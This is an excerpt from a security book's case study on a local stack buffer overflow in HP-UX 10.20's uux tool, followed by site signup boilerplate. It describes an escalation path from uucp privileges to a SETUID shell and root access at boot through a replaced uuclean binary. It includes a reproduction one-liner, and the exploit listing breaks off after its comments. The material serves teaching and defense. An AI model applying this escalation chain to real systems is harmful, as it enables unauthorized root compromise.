Buffer Overflow Attacks: Detect, Exploit, Prevent

Case Study 2.5: Local UUX Buffer Overflow on HPUX

Overview

The /usr/bin/uux is a UUCP-related tool that comes with the HP-UX 10.20. It has a buffer overflow (stack-based) in the code that parses the command line. This can be exploited for executing attacker-supplied code with uucp privileges. This exploit is local and when run it tries to create and compile a Trojan file, /tmp/be.c, with these uucp privileges. This file, when run, creates a copy of /bin/sh in a SETUID file /tmp/ohoh. Then this file, /tmp/Be, is copied in place of the uuclean utility, which is executed on system startup with root privileges because of SETUID bit.

Exploit Code

 <b class="bold">1.</b>  #!/usr/bin/perl  <b class="bold">2.</b>  # <b class="bold">3.</b>  # This exploit was written by the Authoring team for Buffer Overflows <b class="bold">4.</b>  # <b class="bold">5.</b>  # <b class="bold">6.</b>  # The /usr/bin/uux tool that comes with the HP-UX 10.20 install contains a <b class="bold">7.</b>  # buffer overflow vulnerability. To reproduce this: <b class="bold">8.</b>  # <b class="bold">9.</b>  # /usr/bin/uux `perl -e 'print "A" x 5391;print "BBBBB"'`<b class="bold">10.</b>  #<b class="bold">11.</b>  # The overflow vulnerability can be used to gain uucp privileges. Ones uucp<b class="bold">12.</b>  # privs have been obtains it is possible to overwrite the file 'uuclean' with<b class="bold">13.</b>  # any kind of code. Because this file is executed by the S202clean_uucp script <b class="bold">14.</b>  # during boot time of a default HP-UX 10.20 install, we can gain root access. ...

UNLIMITED FREE
ACCESS
TO THE WORLD'S BEST IDEAS

SUBMIT
Already a GlobalSpec user? Log in.

This is embarrasing...

An error occurred while processing the form. Please try again in a few minutes.

Customize Your GlobalSpec Experience

Category: Waveplates and Retardation Plates
Finish!
Privacy Policy

This is embarrasing...

An error occurred while processing the form. Please try again in a few minutes.